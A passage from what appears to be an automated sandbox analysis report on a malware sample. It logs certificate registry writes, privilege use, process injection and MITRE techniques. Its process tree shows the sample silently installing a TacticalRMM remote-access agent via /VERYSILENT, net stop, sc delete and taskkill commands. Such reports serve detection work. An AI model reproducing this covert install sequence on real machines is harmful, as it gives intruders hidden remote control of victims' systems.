7c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	tacticalrmm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	tacticalrmm.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	tacticalrmm.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	tacticalrmm.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	tacticalrmm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4	tacticalrmm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	tacticalrmm.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 0f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec53726187760b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e31d000000010000001000000099949d2179811f6b30a8c99c4f6b42260300000001000000140000002796bae63f1801e277261ba0d77770028f20eee420000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	tacticalrmm.exe

Runs net.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
2744	PING.EXE
2820	PING.EXE

Suspicious behavior: EnumeratesProcesses 16 IoCs

pid	Process
1760	tacticalrmm.exe
1512	tacticalrmm.exe
1600	powershell.exe
2688	powershell.exe
2824	powershell.exe
3000	powershell.exe
1512	tacticalrmm.exe
2468	tacticalrmm.exe
2468	tacticalrmm.exe
2468	tacticalrmm.exe
2468	tacticalrmm.exe
2468	tacticalrmm.exe
2284	tacticalrmm.exe
2984	powershell.exe
2468	tacticalrmm.exe
2304	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2992	taskkill.exe
Token: SeDebugPrivilege	1760	tacticalrmm.exe
Token: SeDebugPrivilege	1512	tacticalrmm.exe
Token: SeAssignPrimaryTokenPrivilege	2092	wmic.exe
Token: SeIncreaseQuotaPrivilege	2092	wmic.exe
Token: SeSecurityPrivilege	2092	wmic.exe
Token: SeTakeOwnershipPrivilege	2092	wmic.exe
Token: SeLoadDriverPrivilege	2092	wmic.exe
Token: SeSystemtimePrivilege	2092	wmic.exe
Token: SeBackupPrivilege	2092	wmic.exe
Token: SeRestorePrivilege	2092	wmic.exe
Token: SeShutdownPrivilege	2092	wmic.exe
Token: SeSystemEnvironmentPrivilege	2092	wmic.exe
Token: SeUndockPrivilege	2092	wmic.exe
Token: SeManageVolumePrivilege	2092	wmic.exe
Token: SeAssignPrimaryTokenPrivilege	2092	wmic.exe
Token: SeIncreaseQuotaPrivilege	2092	wmic.exe
Token: SeSecurityPrivilege	2092	wmic.exe
Token: SeTakeOwnershipPrivilege	2092	wmic.exe
Token: SeLoadDriverPrivilege	2092	wmic.exe
Token: SeSystemtimePrivilege	2092	wmic.exe
Token: SeBackupPrivilege	2092	wmic.exe
Token: SeRestorePrivilege	2092	wmic.exe
Token: SeShutdownPrivilege	2092	wmic.exe
Token: SeSystemEnvironmentPrivilege	2092	wmic.exe
Token: SeUndockPrivilege	2092	wmic.exe
Token: SeManageVolumePrivilege	2092	wmic.exe
Token: SeAssignPrimaryTokenPrivilege	2236	wmic.exe
Token: SeIncreaseQuotaPrivilege	2236	wmic.exe
Token: SeSecurityPrivilege	2236	wmic.exe
Token: SeTakeOwnershipPrivilege	2236	wmic.exe
Token: SeLoadDriverPrivilege	2236	wmic.exe
Token: SeSystemtimePrivilege	2236	wmic.exe
Token: SeBackupPrivilege	2236	wmic.exe
Token: SeRestorePrivilege	2236	wmic.exe
Token: SeShutdownPrivilege	2236	wmic.exe
Token: SeSystemEnvironmentPrivilege	2236	wmic.exe
Token: SeUndockPrivilege	2236	wmic.exe
Token: SeManageVolumePrivilege	2236	wmic.exe
Token: SeAssignPrimaryTokenPrivilege	2236	wmic.exe
Token: SeIncreaseQuotaPrivilege	2236	wmic.exe
Token: SeSecurityPrivilege	2236	wmic.exe
Token: SeTakeOwnershipPrivilege	2236	wmic.exe
Token: SeLoadDriverPrivilege	2236	wmic.exe
Token: SeSystemtimePrivilege	2236	wmic.exe
Token: SeBackupPrivilege	2236	wmic.exe
Token: SeRestorePrivilege	2236	wmic.exe
Token: SeShutdownPrivilege	2236	wmic.exe
Token: SeSystemEnvironmentPrivilege	2236	wmic.exe
Token: SeUndockPrivilege	2236	wmic.exe
Token: SeManageVolumePrivilege	2236	wmic.exe
Token: SeAssignPrimaryTokenPrivilege	1700	wmic.exe
Token: SeIncreaseQuotaPrivilege	1700	wmic.exe
Token: SeSecurityPrivilege	1700	wmic.exe
Token: SeTakeOwnershipPrivilege	1700	wmic.exe
Token: SeLoadDriverPrivilege	1700	wmic.exe
Token: SeSystemtimePrivilege	1700	wmic.exe
Token: SeBackupPrivilege	1700	wmic.exe
Token: SeRestorePrivilege	1700	wmic.exe
Token: SeShutdownPrivilege	1700	wmic.exe
Token: SeSystemEnvironmentPrivilege	1700	wmic.exe
Token: SeUndockPrivilege	1700	wmic.exe
Token: SeManageVolumePrivilege	1700	wmic.exe
Token: SeAssignPrimaryTokenPrivilege	1700	wmic.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2628	tacticalagent-v2.8.0-windows-amd64.tmp

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2120 wrote to memory of 2468	2120	2025-01-23_9f36830d3f867d37d3edd55800ef1677_frostygoop_hijackloader_luca-stealer_poet-rat_snatch.exe	32
PID 2120 wrote to memory of 2468	2120	2025-01-23_9f36830d3f867d37d3edd55800ef1677_frostygoop_hijackloader_luca-stealer_poet-rat_snatch.exe	32
PID 2120 wrote to memory of 2468	2120	2025-01-23_9f36830d3f867d37d3edd55800ef1677_frostygoop_hijackloader_luca-stealer_poet-rat_snatch.exe	32
PID 2120 wrote to memory of 2468	2120	2025-01-23_9f36830d3f867d37d3edd55800ef1677_frostygoop_hijackloader_luca-stealer_poet-rat_snatch.exe	32
PID 2120 wrote to memory of 2468	2120	2025-01-23_9f36830d3f867d37d3edd55800ef1677_frostygoop_hijackloader_luca-stealer_poet-rat_snatch.exe	32
PID 2120 wrote to memory of 2468	2120	2025-01-23_9f36830d3f867d37d3edd55800ef1677_frostygoop_hijackloader_luca-stealer_poet-rat_snatch.exe	32
PID 2120 wrote to memory of 2468	2120	2025-01-23_9f36830d3f867d37d3edd55800ef1677_frostygoop_hijackloader_luca-stealer_poet-rat_snatch.exe	32
PID 2468 wrote to memory of 2628	2468	tacticalagent-v2.8.0-windows-amd64.exe	33
PID 2468 wrote to memory of 2628	2468	tacticalagent-v2.8.0-windows-amd64.exe	33
PID 2468 wrote to memory of 2628	2468	tacticalagent-v2.8.0-windows-amd64.exe	33
PID 2468 wrote to memory of 2628	2468	tacticalagent-v2.8.0-windows-amd64.exe	33
PID 2468 wrote to memory of 2628	2468	tacticalagent-v2.8.0-windows-amd64.exe	33
PID 2468 wrote to memory of 2628	2468	tacticalagent-v2.8.0-windows-amd64.exe	33
PID 2468 wrote to memory of 2628	2468	tacticalagent-v2.8.0-windows-amd64.exe	33
PID 2628 wrote to memory of 2672	2628	tacticalagent-v2.8.0-windows-amd64.tmp	34
PID 2628 wrote to memory of 2672	2628	tacticalagent-v2.8.0-windows-amd64.tmp	34
PID 2628 wrote to memory of 2672	2628	tacticalagent-v2.8.0-windows-amd64.tmp	34
PID 2628 wrote to memory of 2672	2628	tacticalagent-v2.8.0-windows-amd64.tmp	34
PID 2672 wrote to memory of 2744	2672	cmd.exe	36
PID 2672 wrote to memory of 2744	2672	cmd.exe	36
PID 2672 wrote to memory of 2744	2672	cmd.exe	36
PID 2672 wrote to memory of 2744	2672	cmd.exe	36
PID 2672 wrote to memory of 2688	2672	cmd.exe	37
PID 2672 wrote to memory of 2688	2672	cmd.exe	37
PID 2672 wrote to memory of 2688	2672	cmd.exe	37
PID 2672 wrote to memory of 2688	2672	cmd.exe	37
PID 2688 wrote to memory of 2924	2688	net.exe	38
PID 2688 wrote to memory of 2924	2688	net.exe	38
PID 2688 wrote to memory of 2924	2688	net.exe	38
PID 2688 wrote to memory of 2924	2688	net.exe	38
PID 2628 wrote to memory of 2656	2628	tacticalagent-v2.8.0-windows-amd64.tmp	39
PID 2628 wrote to memory of 2656	2628	tacticalagent-v2.8.0-windows-amd64.tmp	39
PID 2628 wrote to memory of 2656	2628	tacticalagent-v2.8.0-windows-amd64.tmp	39
PID 2628 wrote to memory of 2656	2628	tacticalagent-v2.8.0-windows-amd64.tmp	39
PID 2656 wrote to memory of 2760	2656	cmd.exe	41
PID 2656 wrote to memory of 2760	2656	cmd.exe	41
PID 2656 wrote to memory of 2760	2656	cmd.exe	41
PID 2656 wrote to memory of 2760	2656	cmd.exe	41
PID 2760 wrote to memory of 2772	2760	net.exe	42
PID 2760 wrote to memory of 2772	2760	net.exe	42
PID 2760 wrote to memory of 2772	2760	net.exe	42
PID 2760 wrote to memory of 2772	2760	net.exe	42
PID 2628 wrote to memory of 2648	2628	tacticalagent-v2.8.0-windows-amd64.tmp	43
PID 2628 wrote to memory of 2648	2628	tacticalagent-v2.8.0-windows-amd64.tmp	43
PID 2628 wrote to memory of 2648	2628	tacticalagent-v2.8.0-windows-amd64.tmp	43
PID 2628 wrote to memory of 2648	2628	tacticalagent-v2.8.0-windows-amd64.tmp	43
PID 2648 wrote to memory of 2820	2648	cmd.exe	45
PID 2648 wrote to memory of 2820	2648	cmd.exe	45
PID 2648 wrote to memory of 2820	2648	cmd.exe	45
PID 2648 wrote to memory of 2820	2648	cmd.exe	45
PID 2648 wrote to memory of 2548	2648	cmd.exe	46
PID 2648 wrote to memory of 2548	2648	cmd.exe	46
PID 2648 wrote to memory of 2548	2648	cmd.exe	46
PID 2648 wrote to memory of 2548	2648	cmd.exe	46
PID 2548 wrote to memory of 2556	2548	net.exe	47
PID 2548 wrote to memory of 2556	2548	net.exe	47
PID 2548 wrote to memory of 2556	2548	net.exe	47
PID 2548 wrote to memory of 2556	2548	net.exe	47
PID 2628 wrote to memory of 2588	2628	tacticalagent-v2.8.0-windows-amd64.tmp	48
PID 2628 wrote to memory of 2588	2628	tacticalagent-v2.8.0-windows-amd64.tmp	48
PID 2628 wrote to memory of 2588	2628	tacticalagent-v2.8.0-windows-amd64.tmp	48
PID 2628 wrote to memory of 2588	2628	tacticalagent-v2.8.0-windows-amd64.tmp	48
PID 2588 wrote to memory of 2992	2588	cmd.exe	50
PID 2588 wrote to memory of 2992	2588	cmd.exe	50

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\2025-01-23_9f36830d3f867d37d3edd55800ef1677_frostygoop_hijackloader_luca-stealer_poet-rat_snatch.exe
"C:\Users\Admin\AppData\Local\Temp\2025-01-23_9f36830d3f867d37d3edd55800ef1677_frostygoop_hijackloader_luca-stealer_poet-rat_snatch.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2120
- C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe
  C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe /VERYSILENT /SUPPRESSMSGBOXES
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2468
- - C:\Users\Admin\AppData\Local\Temp\is-5EJ0B.tmp\tacticalagent-v2.8.0-windows-amd64.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-5EJ0B.tmp\tacticalagent-v2.8.0-windows-amd64.tmp" /SL5="$70022,3660179,825344,C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe" /VERYSILENT /SUPPRESSMSGBOXES
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:2628
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c ping 127.0.0.1 -n 2 && net stop tacticalrpc
      4⤵
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Internet Connection Discovery
      Suspicious use of WriteProcessMemory
      PID:2672
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 2
        5⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2744
    - - C:\Windows\SysWOW64\net.exe
        
        net stop tacticalrpc
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2688
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop tacticalrpc
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2924
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c net stop tacticalagent
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2656
    - - C:\Windows\SysWOW64\net.exe
        
        net stop tacticalagent
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2760
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop tacticalagent
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2772
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c ping 127.0.0.1 -n 2 && net stop tacticalrmm
      4⤵
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Internet Connection Discovery
      Suspicious use of WriteProcessMemory
      PID:2648
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 2
        5⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2820
    - - C:\Windows\SysWOW64\net.exe
        
        net stop tacticalrmm
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2548
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop tacticalrmm
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2556
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c taskkill /F /IM tacticalrmm.exe
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2588
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM tacticalrmm.exe
        5⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2992
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c sc delete tacticalagent
      4⤵
      System Location Discovery: System Language Discovery
      PID:676
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete tacticalagent
        5⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:568
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c sc delete tacticalrpc
      4⤵
      System Location Discovery: System Language Discovery
      PID:2604
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete tacticalrpc
        5⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:1800
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c tacticalrmm.exe -m installsvc
      4⤵
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:1360
    - - C:\Program Files\TacticalAgent\tacticalrmm.exe
        
        tacticalrmm.exe -m installsvc
        5⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1760
  - - C:\Windows\SysWOW64\cmd.exe
